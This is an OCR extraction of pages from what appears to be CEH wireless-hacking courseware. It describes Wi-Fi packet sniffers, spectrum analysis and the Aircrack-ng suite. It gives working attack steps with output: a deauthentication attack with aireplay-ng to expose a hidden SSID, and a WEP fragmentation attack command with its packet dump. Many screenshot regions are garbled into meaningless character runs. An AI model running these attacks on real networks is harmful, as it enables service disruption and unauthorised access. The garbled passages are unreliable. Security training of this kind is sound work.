^TC*c/y«»orK*>*

)J C)oa«All Tabs G«ra3!‫׳‬v3Sttnec

It helps in Identifying rogue w ireless

- ^ OUpMeSoucw

**‫•״‬

&J

C EH

& V* □

UDetad‫־‬

3 F CangMMni ‫ ־‬O BarA‫״‬ahOverT«ne O SemeeResponseTimebyWebOt*eet. Light* O

IHagr•byTndfccType

n etw orks and stations J

It isolates specific packets

J

It provides an interactive and visuallyoriented interface

I

‫׳׳‬

‫ ׳‬/■ /‫״‬/ / ‫* ׳‬


W i-Fi P a c k e t Sniffer: C a sc a d e Pilot Source: http://www.riverbed.com Cascade Pilot Personal Edition (Wi-Fi pilot) is an analyzer for wired and wireless networks that revolutionizes the use of Wireshark. Fully integrated with Wireshark, Cascade Pilot Personal Edition capitalizes on s' existing expertise while dramatically increasing efficiency in identifying and diagnosing network problems. Wi-Fi Pilot does: 9

It measures wireless channel utilization from the data and spectrum points of view simultaneously

Q

It helps in identifying rogue wireless networks and stations

Q

It provides professional detailed reports

Module 15 Page 2274



. *‫י־‬

S

Home


1 TimeControl

Cascade Pilot (66 day\ remaevng)

Walchee1‫־‬ Reportng

• MFoMtl

verta

OuMkSuat

“^D»er>T*orK4>t*)*( A

Add Trace

ClCtonMT*,

<«) »Ja‫׳‬ne Resdubor ■

QGamgSnnM

VSuty^Maa

F.k

-1“ ■

(W de

4 k Detach

MreshaA

F I•

a

Generd D w ta

«‫ «ז׳‬OSorvKef

Fites

eh

efcOtotec! •bgN * O Network Usage b f Traffic Type

«# OevK*WPK0.41J742_;350021FE‫ ־‬.

0

‫ ♦־‬M.cr s
a e » > * ‫>« ״‬Oy»T1«» 512 PM)(‫_|»י‬ Q IP Corversebors

BJ--

I

1

■T ons

2 SOU

* ‫׳•’ ׳‬

* 12 PM) Is * IdJ

Network Osage by Traftc Type 5 'i! ‫י‬

‫>ן‬

m

StartScotch

1, 1 1 1 1 ft

v*

fflE

t CaRacerdy Used Bard»»dJh Over Tene

s

0 __ (111 A i l i*

■I I

■/! ■A.JI., a A K

gptoubog

1

g ^ jn .r Q*-n

AA

a

S' ‫•־‬ All AAA

Id)

4^'

(

QNMkUMpsbrTriftcTyp• 0« »I,] Protocol C»str»fc/>or •&t J Protocol Ostr»tvrt>or B,!-‫׳‬tes »?«I,) Protocol C*stT»feoJ>cr -P*ch 6er*r«c

1

&MS-Net»Oft n g

>

Events

PeaKe* PCk G6€ Ferrrfy Cor

< Idlofs

4►

Microsoft Corporator (2)

» 00u

3S »*u

21T|W

^ 802 ‫וד‬

LAN arc

fiefAC*

‫״׳‬j 6ar4jA»«f Usage

TK*m •‫ גי־״‬Ccrtversabcns ^ Pf‫״‬V ‫׳‬r^r<* •rvJ Error!

Î

•

‫י‬0 ‫ » ז ן ן ז ג‬4‫ ן ז‬h o

/‫✓ ׳‬

Tfsrsac&cr Analysis

.4MJt, Seg‫׳‬r*rr M y s * (MSA)

»4‫ ן ? י‬i w i o r m j t *.

* //* *

‫׳‬

t- v

■

Cievert SelacfeaB 1125 29 18 17 - 33 15 ‫ל‬ft # 1 sec - M V M w

Network lH a 9e by Tra#* Type on Reeltck PO e G6E fenwly Controller at 5:1 5 PM

-

’ " 6 33

"

‫ ־‬:;‫ל‬

D n p / U b ’ D«,

Selected Chert Retetrve Network Usage

FIGURE 15.41: Cascade Pilot Screenshot

Module 15 Page 2275




Wi-Fi Packet Sniffer: O m niPeek I C EH J

OmniPeek network analyzer offers real-time visibility and analysis of the network traffic from a single interface,

J

It provides a comprehensive view of all wireless network activity showing each wireless network, the APs

including Ethernet, 802.11a/b/g/n wireless and VoIP comprising that network, and the s connected to each AP

mUPMk*:> UmniK'fl‫׳‬

a j 3 a,.‫ *־‬. j — : - 1 1 !1 ‫־‬

V

e 5:0kmc : ir ff 0 N1M»K) ITM U0

t‫»«־‬,.»r.. S-J08J

;7-0,d»v ‫נ‬-‫א‬4‫כ‬

rr.r:

0 rrrr; c e;1 e*»aj n :r:

•***‫יי‬

‫י‬4‫נ‬,

Pbt

v Mrv*> Uiponn :1st (0

4.HM tx1 n : n •.0*TC»V30)

12‫ג‬. 1‫י‬4.‫ג‬2.1«4 *4.121.22) . 149

10.0.1.2

tllO U M ) 4 «:‫ננינל»ג‬ 4 «421‫גג<ינ‬ ‫ ל‬2:«22« 0‫נ‬ ‫ י‬3! : 44«::‫נ‬ ‫) י‬H I4 JW SIS 82W0. 7(

S.129.16) 4.4?.»j 4.(7.222

10.9.1.{

10.0.1.1

l»7.Si.(7.222

10.0.1.1 10.0.1.1

: 100-1737 .

Stc- 443,D*t- U4C, .Ik..3. ,3fee• 1940,0k * 443, .A...... 3-1

‫ י‬5* 2* 00(

!re- :040,Oft- 4-43. .f.. ..S-l

‫י‬.6«»‫נ»מ‬

157.5(.(7.222 157.5(.(7.222 10.0.4.1 10.9.1.1

‫ י‬6» « ‫ יי‬0‫י‬

40.Dai- 443. Jk-- .S-J

‫ י‬. ‫ מ « ו‬5« ‫נ‬ t 041C44W t

BJ tznanet raecctc 2.000

DuWMn (

h ttp://w w w . wildpackets. com Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

U f..Y 'J (h

F®

_

__

_ _

_

_

___

____

_

W i-Fi Packet Sniffer: O m niPeek Source: http://www.wildpackets.com

OmniPeek network analyzer provides a graphical interface that the s can use to analyze and troubleshoot enterprise networks. It even offers Omreal-time visibility and analysis into every part of the network from a single interface, including Ethernet, Gigabit, 10 Gigabit, 802.11a/b/g/n wireless, VoIP, and Video to remote offices. Using OmniPeek's interface and "top-down" approach to visualizing network conditions, the s can analyze, drill down and fix performance bottlenecks across multiple network segments. Highlights: Q Comprehensive network performance management and monitoring enterprise networks, including network segments at remote offices

of

entire

9

Interactive monitoring of key network statistics in real-time, aggregating multiple files, and instantly drilling down to packets using the "Com" interactive dashboard

9

Deep packet inspection

9

Integrated for Ethernet, Gigabit, 10 Gigabit, 802.11a/b/g/n wireless (Including 3-stream), VoIP, Video, MPLS, and VLAN

Module 15 Page 2276

Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.



9

Intuitive drill-down to understand which nodes are communicating, which protocols and sub-protocols are being transmitted, and which traffic characteristics are affecting network performance

9

Complete voice and video over IP real-time monitoring including high-level multimedia dashboard, call data record (CDR), and comprehensive signaling and media analyses

9

Application performance monitoring and analysis in the context of overall network activity including the ability to monitor application response time, round-trip network delay, server responsiveness, database transactions per second, and myriad other lowlevel statistics.

9

An extensible requirements

architecture

that

can

be

easily tailored

to

individual

network

- ‫■י־‬ : n#

Mt

view

> *‫ ־‬t - H

captire

'< E

‫ י‬al h

4,000 fltnrd: 2.000

:V T

Monitor

b

h

Took

<; T !

Window

Help

4 1*

W iid P a c k c H 'S m n iP c e k

‫־‬a] □

!

,

w

0 .

J

;

Capture 1 x

Start •‫׳‬i j« !, jc u ((

send

r> butter u u j* : fl1lr»

\% *■‫ י‬Accept dll packets

j— Start Copcuc —

0fka oucm kxi here Loc F' foe hot)

P4ck»t SCLTC* 1 ‫י‬ 2 3 4 5 6 7 ' 8 9 10 11 12 13

11hers Expert

flat Web Servers

*rxjes f Voice & Video

Visuals

^2e^Map

ôtoccb S jrw r

I►!

‫ ׳*׳‬N»IH J ‫׳‬. ‫־‬. ‫ ׳י‬-I ‫»י‬

Oo911boards v*tACr< o a iv d M flpdr*

‫״‬ 16 17 18 19 20 21 22 23 24 25 2( 27 28 ' 29 30

1 0 .0 .0 .2 1 0 .0 .0 .2 1 7 3 .1 9 4 .3 6 .4 1 7 3 .1 9 4 .3 6 .4 1 0 .0 .0 .2 1 0 . 0 . 0 .2 7 4 .L 2 5 .1 2 e .1 3 9 1 0 .0 .0 .2 1 0 .0 .0 .2 1 0 .0 .0 .2 1 7 3 .1 9 4 .3 6 .2 2 1 7 3 .1 9 4 .3 6 .2 2 1 7 3 .1 9 4 .3 6 .2 2 1 7 3 .1 9 4 .3 6 .2 2 1 7 3 .1 9 4 .3 6 .2 2 1 0 .0 .0 .2 1 0 .0 .0 .2 1 2 3 .1 7 6 .3 2 .1 5 4 7 4 .1 2 5 .L 2 C .1 8 9 1 0 .0 .0 .2 1 0 .0 .0 .2 1 0 .0 .0 .S 1 5 7 .5 6 .6 7 .3 2 2 1 0 .0 .0 .5 1 G .0.G .S 1 6 7 .5 6 .6 7 .2 2 2 1 5 7 .5 6 .6 7 .2 2 2 1 0 .0 .0 .5 1 0 .0 .0 .2 1 0 .0 .0 .2

pugs 1 7 3 .1 9 4 .3 6 .4 i 1 7 3 .1 9 4 .3 6 .4 j 1 0 .0 .0 .2 LG.0 .0 .2 1 7 3 .1 9 4 .3 6 .4 1 7 3 .1 9 4 .3 6 .4 j 1 0 .0 .0 .2 1 7 4 .1 2 5 .1 2 3 .1 8 9 1 7 3 .L 9 4 .3 6 .2 2 J 1 7 3 .1 9 4 .3 6 .2 2 i 1 0 .0 .0 .2 j 1 0 .0 .0 .2 1 0 .0 .0 .2 1 0 .0 .0 .2 j 1 0 .0 .0 .2 1 L 7 3 .L 9 4 .3 6 .2 2 L23. L76. 3 2 .1 5 4 LG.0 .0 .2 j 1 0 .0 .0 .2 1 74.L 25.12B .1C 9 1 7 7 .2 4 6 .4 7 .1 5 3 1 5 7 .5 6 .6 7 .2 2 2 j 1 0 .0 .0 .5 1 5 7 .5 6 .6 7 .2 2 2 1 5 7 .5 6 .6 7 .2 2 2 s LG.0 .0 .5 1 0 .0 .0 .5 1 5 7 .5 6 .6 7 .2 2 2 1 7 3 .1 9 4 .3 6 .4 ____‫ נ‬1 7 3 .L94.3 6 .4

s» 95 95 95 S5 64 64 163 64 2370 91 64 64 64 lie 936 64 64 70 163 64 64 70 70 64 164 1516 1518 64 es 64

R1>U3/#Ttnr C. 0X C 0 3 X 0 0 .0 X 6 5 5 X 0 C .0 X 2 0 0 X 0 C .031C 45X 0 C .0 3S 625X 0 0 .0 3 9 6 4 5 X 0 C .7 7 1222X 0 C.8 1 1 8 9 3 X 0 4 .3 1 8 2 3 5 X 0 4 . 31E3010C0 4.3 5 2 1 2 7 X 0 4 .3 5 4 1 4 7 X 0 4.35S C 64X 0 4 .5 3 5 2 9 4 X 0 4 .5 5 6 9 6 3 X 0 4 .5 3 7C 00X 0 6.097C 97X 0 6 .1 X 1 1 3 X 0 6 .9 2 2 6 4 5 X 0 6 .9 5 2 1 3 7 X 0 T .2 1 6 2 2 3 X 0 7 .3 0 1 4 4 9 X 0 7 . 5554 35 X 0 7.5 5 C 9 2 5 X 0 7 .5 X 2 9 0 X 0 7.8S C S 86X 0 7 .8 5 2 2 0 7 X 0 7 .8 5 3 3 3 5 X 0 8.001C 46X 0 6.001C 9 0 X 0

Protocol HTTPS HTTPS HTTPS ■ITT?3 HTTPS HTTPS 3ITP3 HITPS HITPS HTTPS HTTP3 HITPS ■DTPS HTTPS HTTPS HITPS HIT? HIT? HTTPS 3TTP3 HIT? HITPS HTTP5 HTTPS HTTPS HITPS HITPS HTTPS HTTPS HITPS

Surwrvry Cxprit Src■ 1 7 6 9 ,DSC■ 4 4 3 ,.A P .. . .S - 1 4 B 6 ... Src■ 17T0,D 3t■ 4 4 3 ,.A P .. .,3 » 3 8 6 5 ... S r c - 4 4 3 , 01770 - ‫ ב כ‬, . AP. . . . s - 7 9 6 ... S r c - 4 4 3 ,D as- 1 7 6 9 ,.A P .. . , 3 - 3 0 3 3 . . . Src= 1 7 6 9 ,0 8 t= 4 1 3 ,. A . . . . , S - 1 4 2 6 .. . Src= 1 7 7 0 ,D3t= 4 4 3 ,. A . . . ..3 = 3 8 6 5 ... Src= 4 4 3 ,D3t= 1 0 5 3 ,.A ? .. ..3 = 1 7 0 9 ... Src- 1 0 8 3 , 4 4 3 - ‫ ב בס‬,. . 3A. . .9 5 6 ... Src= 10SL ,D st= 4 4 3 ,.A P .. . , S=. 0 0 7 ... Src= 1 0 5 1 ,D3t= 4 4 3 ,.A P .. - .5= 0 D 7 ... Src= 4 4 3 , 01051 =‫ ב ב‬, . A. . . ..3 = 9 4 . . . S r c - 4 4 3 , 01051 - ‫ ב כ‬, . A. . . . , 3- 9 4 . . . S r c - 4 4 3 , D31051 - ‫ ־‬, . A. . . . , S- 9 4 . . . Src= 443,D St= 1 0 5 1 ,.A P .. • .5= 94. . . Slow Se r v er R esponse Time (C Src= 4 4 3 ,D3u= 1 0 5 1 ,•A ? .. -.3 = 94. . . S r c - 105L, 443 - ‫ ב בס‬, . A. . . . , S- 4 0 0 7 ... C PORI-1728 . Src= 80, 1723 =‫ ב » ס‬, • A. . . . , S=‫ ״‬9 9 7 ... 5rc= 4 4 3 ,D3t= 1 0 8 3 ,.A P .. .,3 = 1 7 0 9 ... 3rc= 1 0 6 3 ,0 3t= 4 4 3 ,. A . . . ..3 = 9 5 6 ... C PORI-172" . Src= 1040 , ‫ =ב*ס‬, 443 ------ S .,S = 1 8 3 0 ... 5rc= 4 4 3 ,D 9ts 1 0 4 0 ,.A ..5 - .5= 5 1 9 ... S rc* 1 0 4 0 ,Oat* 4 4 3 ,. A . . . . , 3 - 1 8 3 0 . . . Src- 1 0 4 0 , 4 4 3 - ‫ ב ג ס‬,. ,.3AP. - 1 8. 3 0 . . . , S-. . S 1 9 ... Slow S erver Rcaponrc Ti m (0 S r c - 4 4 3 , 1 0 4 0 - ‫ ס‬0 ‫ ב‬, . A. sr c■ 4 4 3 ,DSt■ 1 0 4 0 ,.A .. . •. 5■ 5 1 9 ... Src■ 1 0 4 0 ,D 3 t- 443, . A ... . , 3 - 1 8 3 0 . . . Src- 1 7 7 0 , 4 4 3 - ‫ ב ג ס‬,. ,. S AP. - 3 .8 6 3 .. . Src- 1 7 7 0 , 4 1 3 - ‫ ב ג ס‬,. ,. S A.-R. 3 8 6 9 .. . ■‫ ע‬r»hernrt Petkriv ?.000

Mr fo r Help, press f ‫י‬

D uinton 001:25 0

,Jcne

FIGURE 15.42: OmniPeek analyzing enterprise network

Module 15 Page 2277




Wi-Fi Packet Sniffer: C om m View for Wi-Fi J

CommView for Wi-Fi is designed for capturing and analyzing network packets on wireless 802.11a/b/g/n networks

F e a tu re s 6

CEH

. CommView for WiFi -D Link AirPremier DWI-AG530 Wireless PCI Adapter File

Search

View

Tools Settings

R iies

Help

'Ig S ^ lR F R F • ■ ?

It gathers information from the wireless

(>) Nodes | (m ) Channels | ^

Latest IP Connections

^

Packets

j

Logging | ^

Rules |

N/A 1900 1900 N/A N/A

Quick Filter

adapter and decodes the analyzed data s

Broadcast 01:00:5E:... 33:33:00:... Broadcast Broadcast

It can decrypt packets utilizing -defined W E P or WPA-PSK keys

N/A 192.168.0.4 158.22.250.0 192.168.0.4 N/A

N/A 239.255.2... 0.0.0.12 192.168.0.1 N/A

and decode them to the

0x0000

08

4 1 2C 0 0 0 0 OF 3D

1 9 -0 5 00

00

14

AS 2D 6 1

2F

0x0010

00

0 2 B 3 9 6 OC IC

A I-A A AA 0 3

00

00

00

lowest layer, with full

0x0020

45

00 00

analysis of the most

0x0030

co

A 8 00 01 0

0x0040

50

18 40 D5 0

widespread protocol

«5

00 08

Copy Address

4F 2 ................................................................................................

] W1r*l«s P*ck*t Info Sign*! kvtl: 0144 (68) R«t«: S4.0 Mbps Band: 802.1 lg Ch*nr*J: 11 • 2462 MH* Date: 7-X1I-2006 Tim•: 13:21:5S .677507 Capture: Off

20

Open Packet(s) m New Window

Raw contents of the packet

Copy Packet Send Packet(s) Save Packet(s) As ...

Decoded packet information for the selected packet

Packets: 29,6931Keys: W E P.W PA

Auto-saving: o ff

SmartWhois Clear Packet Btifer

Rules: O fu

http ://w w w . tamos, com Copyright © b y

EG-G*ancil. All

Rights Reserved. Reproduction is Strictly Prohibited

W i-Fi Packet Sniffer: Com m View for W i-F i Source: http://www.tamos.com CommView for Wi-Fi is a wireless network monitor and analyzer for 802.11 a/b/g/n networks. It captures every packet on the air to display important information such as the list of access points and stations, per-node and per-channel statistics, signal strength, a list of packets and network connections, protocol distribution charts, etc. By providing this information, CommView for Wi-Fi can help view and examine packets, pinpoint network problems, and troubleshoot software and hardware. It includes a VoIP module for in-depth analysis, recording, and playback of SIP and H.323 voice communications. Packets can be decrypted utilizing -defined W EP or WPA-PSK keys and are decoded down to the lowest layer. With over 70 ed protocols, this network analyzer allows s to see every detail of a captured packet using a convenient tree-like structure to display protocol layers and packet headers. Additionally, the product provides an open interface for plugging in custom decoding modules. W EP and WPA key retrieval add-ons are available subject to and conditions. This application runs under Windows XP/2003/Vista/2008/7 and requires a compatible wireless network adapter.

Module 15 Page 2278



A


- i n i x|

C o m m V ie w fo r W iF i - D -l in k A ir P r e m ie r O W I- A G 5 3 0 W 1r e l * * « P ( ‫ ־‬I A d a p t e r F ie

a

Se arch

a

View

1

Took

0

Settings

9

1

Rules

1

Help

?

». 1 w .&<2

Nodes | (M j Channels | ♦fr Latest IP Connections

MNGT/BEA...

IP/UDP IP/UDP ARP REQ MNGT/BEA...

0x0000 OxOOlO 0x0020 0x0030 0x0040

MyAP GemtekTe... GemtekTe... GemtekTe... MyAP 08 00 4S CO 50

41 02 00 A8 18

2C B3 00 00 40

Broadcast 01:00:5E:... 33:33:00:... Broadcast Broadcast

1 ^ j Packcts

N/A 192.168.0.4 158.22.2SC.0 192.168.0.4 N/A

|

N/A 239.2SS.2... 0.0.0.12 192.168.0.1 N/A

Loggng I

N/A 1900 1900 N/A N/A

00 00 OF 3D B9-05 00 00 14 A5 2D 61 2F OC EC 20 A 8 - A A A A 03 00 00 00 08 00 4F 2“ 01 0 R a w contents of the packet DS 0. ____ _. .. .. .. _ _

96

Q Wlwl«» Packet Info & nel kvd: 0x44 (88) R *t: 54.0 Mbps Channel: 11 •2462 MHz

Alarms |

«a...

Quick F fter

)ted...

O p en P ac k e t(s ) in New W indow

)ted...

‫מ‬0‫״‬.

C rea te Abas

►

C o p y Address

►

.A K. A“ P.

C o p y Packet Se n d P ac ket(s)

►

11

S a v e P ac k e t(s ) A s ... Sm artW hois

►

-

D e c o d e d packet information for the Clear Packet Buffer

selected packet

Date: 7•Jul-2006 Tim♦13 ‫־‬a155W750? C ap tu re: O ff

Rules |

Reconstruct T Session

9

$02.119

1/

Packets: 29,693 | K eys: W E P ,W P A

Auto-saving: Off

Decode As

►

Font

►

Rules: OfL

FIGURE 15.43: CommView for Wi-Fi screenshot

Module 15 Page 2279




1

What Is Spectrum Analysis?

CEH

Urt1fw4

ilhiul lUtbM

RF spectrum analyzers exam ine Wi-Fi radio transm issions and m easure the pow er (am plitude) of radio signals and RF pulses, and transform these m easurem ents into num eric sequences

J

Spectrum analyzers employ statistical analysis to plot spectral usage, quantify "air quality,‫ ״‬and isolate transmission sources

J

RF spectrum analyzers are used by RF technicians to install and maintain wireless networks, and identify sources of interference

J

Wi-Fi spectrum analysis also helps in wireless attack detection, including Denial of Service attacks, authentication/ encryptions attacks, network penetration attacks, etc.

J

Spectrum analysis tools: © Wi-Spy and Chanalyzer © AirMagnet Wi-Fi Analyzer »

WifiEagle

Copyright © by EG-GtODCil. All Rights R eserved. Reproduction is Strictly Prohibited.

—0 1 What Is Spectrum Analysis? RF spectrum analyzers examine the Wi-Fi radio transmission, measure the power (amplitude) of radio signals and RF pulses, and transform these measurements into numeric sequences. Spectrum analyzers employ statistical analysis to plot spectral usage, quantify "air quality," and isolate transmission sources. RF spectrum analyzers are used by RF technicians to install and maintain wireless networks, and identify sources of interference. Wi-Fi spectrum analysis also helps in wireless attack detection, including denial-of-service attacks, authentication/ encryptions attacks, network penetration attacks, etc. Traditional spectrum analyzers are purpose-built test equipment. Wi-Fi spectrum analyzers can be used in many ways. Consider the task of identifying and avoiding interference between the WLAN and devices competing for the same frequencies. If you suspect RF interference, turn off the affected AP or station, then use one of the Wi-Fi spectrum analyzer tools to see whether any device is transmitting within a given frequency range. If the interference exists, then the s can eliminate the interference by reconfiguring the WLAN to another band or channel that don't overlap other frequencies in the vicinity. Or else try to remove the interference or shield the source of interference. Spectrum analysis tools: Wi-Spy and Chanalyzer, AirMagnet Wi-Fi Analyzer, WifiEagle, etc.

Module 15 Page 2280




Wi-Fi P acket Sniffers Sniffer Portable Professional Analyzer

CEH

Airscanner Mobile Sniffer

http://www.airscanner.com

http://www.netscout.com

M

Capsa WiFi

http://www.colasoft,com

Observer

•

PRTG Network Monitor

http://www.networkinstruments.com

WifiScanner

http://www.paessler.com

http://wifiscanner.sourceforge.net

ApSniff

http://www.monolith81.de

BBS aac

http://www.monolith81.de

::[nnl EI h b I

http://iperf.sourceforge.net

Mognet

\ NetworkMiner

http://www.netresec.com

Copyright © b y

‫ י‬.‫י‬

Iperf

EG-G*ancil. All


W i-Fi Packet Sniffers

Wi-Fi packet sniffers help you to monitor, detect, and troubleshoot critical network and application performance problems. Various Wi-Fi packet sniffers that are readily available in the market are listed as follows: 9

Sniffer Portable Professional Analyzer available at http://www.netscout.com

9

Capsa WiFi available at http://www.colasoft.com

9

PRTG Network Monitor available at http://www.paessler.com

9

ApSniff available at http://www.monolith81.de

9

NetworkMiner available at http://www.netresec.com

9

Airscanner Mobile Sniffer available at http://www.airscanner.com

9

Observer available at http://www.networkinstruments.com

9

WifiScanner available at http://wifiscanner.sourceforge.net

9

Mognet available at http://www.monolith81.de

9

Iperf available at http://iperf.sourceforge.net

Module 15 Page 2281





CEH


C o m p ro m ise the W i-Fi N e tw o rk

Launch Wireless Attacks

C ra c k

Wi-Fi Encryption

Copyright @ b y iC - G 0 U C il. All Rights Reserved. Reproduction is Strictly Prohibited.

W ireless Hacking Methodology C vAs the discovery, mapping, and analysis of the target wireless network is done, it's time to launch attacks on it. Many active attacks such as fragmentation attacks, MAC spoofing attacks, denial-of-service attacks, ARP poisoning attacks, etc. can be launched against wireless networks. The following slides give you a detailed explanation about each attack and how it is launched.

Module 15 Page 2282




A ircrack-ng Suite

CEH

Aircrack-ng is a n etw ork so ftw are suite consisting of a detector, packet sniffer, W E P and W PA/W PA2-PSK

©

cracker and analysis tool for 802.11 wireless networks. This program runs under Linux and W indow s.

http://www.aircrack-ng.org

Airgraph-ng Used for traffic generation, fake authentication, packet replay, and ARP request injection

m onitor m ode on

Airolib-ng

Used to capture

Store and manage

AP relationship and common

packets o f raw

essid and

802.11 frames and

lists used in W P A / W P A 2 cracking

probe graph from

collect W E P IVs

airodum p file

Airtun-ng

Airmon‫־‬ng Used to enable

Airodump-ng

\ f

Creates client to

0

Injects frames into a WPA TKIP network with

wireless interfaces from managed m ode and vice versa

QoS, and can recover • MIC key and keystream from Wi-Fi traffic

Tkiptun-ng

Packetforge-ng Allows you to communicate via a WEP-encrypted access point (AP) without knowing the WEP key

Used to create

f

encrypted packets

I

th at can subsequently be used for injection

:

Creates a virtual tunnel interface to monitor encrypted traffic and inject arbitrary traffic into a network

Airserv-ng Allow s multiple programs to independently use a Wi-Fi card via a client-server T connection

/ Wesside-ng Incorporates a num ber of techniques to seamlessly obtain a L W E P key in m in u te s !

Copyright © b y iC - G 0 U C il. All Rights Reserved. Reproduction is Strictly Prohibited.

Aircrack-ng Suite 1 9 Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP, and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless networks. This program runs under Linux and Windows. It works with any wireless card whose driver s raw monitoring mode and can sniff 802.11a, 802.11b, and 802.l l g traffic. The suite includes many programs. The following is the list of programs included in the Aircrack-ng suite: Program Name

Description

Airbase‫־‬ng

Captures WPA/WPA2 handshake and can act as an ad-hoc access point

Aircrack-ng

Defacto WEP and WPA/ WPA2-PSK cracking tool

Airdecap-ng

Decrypt WEP/WPA/ WPA2 and can be used to strip the wireless headers from Wi-Fi packets

Airdecloak-ng

Removes WEP cloaking from a pcap file

Removes W EP cloaking from a pcap file

Provides status information about the wireless drivers on your system

Airdrop-ng

This program is used for targeted, rule-based deauthentication of s

Aireplay-ng

Used for traffic generation, fake authentication, packet replay, and

Module 15 Page 2283

ARP




request injection Airgraph-ng

Airodump-ng

Creates client to AP relationship and common probe graph from airodump file Used to capture packets of raw 802.11 frames and collect W EP IVs

Airolib-ng

Store and manage ESSID and lists used in WPA/ WPA2 cracking

Airserv-ng

Allows multiple programs to independently use a Wi-Fi server T connection

Airmon-ng

Used to enable monitor mode on wireless interfaces from managed mode and vice versa

Airtun-ng

Injects frames into a WPA TKIP network with QoS, and can recover MIC key and keystram from Wi-Fi traffic

Easside-ng

Allows you to communicate via a WEP-encrypted access point (AP) without knowing the WEP key

Packetforge-ng

Used to create encrypted packets that can subsequently be used for injection

Tkiptun-ng

Creates a virtual tunnel interface to monitor encrypted traffic and inject arbitrary traffic into a network

Wesside-ng

Incorporates a number of techniques to seamlessly obtain a W EP key in minutes

card via a client-

TABLE 15.10: List of programs in the Aircrack-ng suite

Module 15 Page 2284




How to R e v e a l Hidden SSIDs 0^ . .

Command Prompt .

c:\>a!rmon-ng s ta r t e t n i

Q] 9

Step 1: Run airmon-ng in

‫*יי‬

monitor mode

C:\>airodum p-ng - iv s - w r i t e c a p tu r e e t h l BSSID

RXQ

CH

MB

ENC

99

5

60

3

0

1

54e

OPN

IAM ROGER

02:24:2B:CD:68:EE

99

9

75

2

0

5

54e

OPN

COMPANYZONE

Step 2: Start airodump to

00:14:60:95:6C:FC

99

0

15

0

0

9

54e

W EP

W EP

H OM E

discover SSIDs on

00:22:3F:AE:68:6E

76

70

157

1

0

11

54e

W EP

W EP

Beacons

#Data, #/s

CIPHER

AUTH

ESSID

1 ■

PW R

02:24:2B:CD:68:EF

\

interface

clength: 10> •

....................... • y BSSID

Station

00:22:3F:AE:68:6E 00:22:3F:AE:68:6E

PW R

Rate

Lost

Packets

00:17:9A:C3:CF:C2

-1

1- 0

0

1

00:1F:5B:BA:A7:CD

76

le-54

0

6

*• Hidden SSID

Probes

-

‫[ם‬

Command Prompt C:\>aireplay-ng - d e a u th 11 -a 00:22:3F:AE:68:6E

Step 3: Oeauthenticate (deauth) the client to reveal hidden SSID using Aireplay-ng

Command Prompt Step 4: Switch to BSSID

P W R RXQ Beacons #Data, #/s CH M B ENC CIPHER AUTH ESSID

00:22:3F:AE:68:6E

76

70

157

1

0

11 54e W E P

W EP

airodump to see the revealed SSID

Secret SSID

C o pyrigh t © b y EC-CMMCil. All Rights Reserved.;R ep rod u ctio n is Strictly Probfbited.

fe C

How to Reveal Hidden SSIDs

Hidden SSIDs can be revealed by using the Aircrack-ng suite. The process involves the following steps: Step 1: Run airmon-ng in monitor mode Step 2: Start airodump to discover SSIDs on interface Com m and Pro m p t

□ ▲ ■

c:\>airm0 n-ng start e th l C:\>airodump-ng —ivs --write capture e t h l PWR

RXQ

02:24:2B:CD:68:EF

BSSID

99

5

Beacons 60

#Data, #/s 0 3

02:24:2B:CD:68:EE

99

9

75

2

00:14:6C:95:6C:FC

99

0

15

0

00:22:3F:AE:68:6E

76

70

157

1

CH

MB

ENC

CIPHER

1

54e OPN

5

54e

OPN

0

9

54e

WEP

WEP

0

11

54e WEP

WEP

0

AUTH

ESSID IAMROGER COMPANYZONE ■‫־־‬ HOME • : ....................... ‫■ * ־‬

BSSID

Station

PWR

Rate

Lost

Packets

00:22:3F:AE:68:6E 00:17:9A:C3:CF:C2

-1

1-0

0

1

00:22:3F:AE:68:6E 00:1F:5B:BA:A7:CD

76

le-54

0

6

Probes

Hidden SSID

-

F IG U R E 15.44: Discovering Hidden SSIDs

Module 15 Page 2285




Step 3: De-authenticate (deauth) the client to reveal hidden SSID using Aireplay-ng j g l Command Prompt

4

| c:\>aireplay-ng --deauth 11 -a 00 :2 2 :3 F:A E :6 8 :6 E

FIGURE 15.45: De-authenticating the client using Aireplay-ng

Step 4: Switch to airodump to see the revealed SSID 3S

Command Prompt

BSSID

‫ם‬

PWR RXQ Beacons ffData, it/s CH MB ENC CIPHER AUTH ESSID

00:22:3F:AE:68:6E 76

70

157

1

0

11 54eWEP WEP

Secret SSID

FIGURE 15.46: Viewing the disclosed SSID using airodump

Module 15 Page 2286




F ragm entation Attack

CEH (•rtifwtf

I til1(41 Nm Im

■ A fragm entation attack, when successful, can obtain 1500 bytes of PR G A (pseudo random generation algorithm) M This attack does not reco ver the W E P key itself, but m erely obtains the PRGA The PR G A can then be used to generate packets w ith packetforge‫־‬ng which are in turn used for various injection attacks It requires at least one data packet to be received from the access point in order to initiate the attack

□

Command Prompt

Command Prompt

C:\> airep lay-ng -5 -b 00:1 4 :6C :7 E:4 0 :8 0 -h 0 0 :0 F :B 5 :A B :C B :9 D athO

Waiting for a data packet... Read 96 packets... Size: 120, FrooDS: 1, ToDS: 0 (WEP) BSSID - 00:14:6C:7E:40:80 Dest. MAC - 00:OF:B5:AB:CB:9D Source MAC - 00:D0:CF:03:34:8C 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: 0x0060: 0x0070: Use this

0842 0201 OOOf OOdO cf03 348c 6d6d bleO 92a8 a21d 2a70 49cf 7013 f7f3 5953 fd55 66a2 030f 517f 1544 bd82 0505 933f af2f packet ? y

b5ab e0d2 039b eef8 1234 472d ad77 740e

cb9d 4001 ca6f 19b9 5727 2682 fe9a

0014 0000 cecb 279c 146c 3957 cd99

6c7e 2b62 5364 9020 eeaa 8429 a43c

4080 .B........ l-«. 7a01 ---4.. .0...♦bz. 6el6 1m ..... o. .Sdn. 30c4 ..*pi....0. a594 P...YS.4W.1___ 9ca5 .Uf...G-&.9W.) .. 52a1 QQD. ..w....

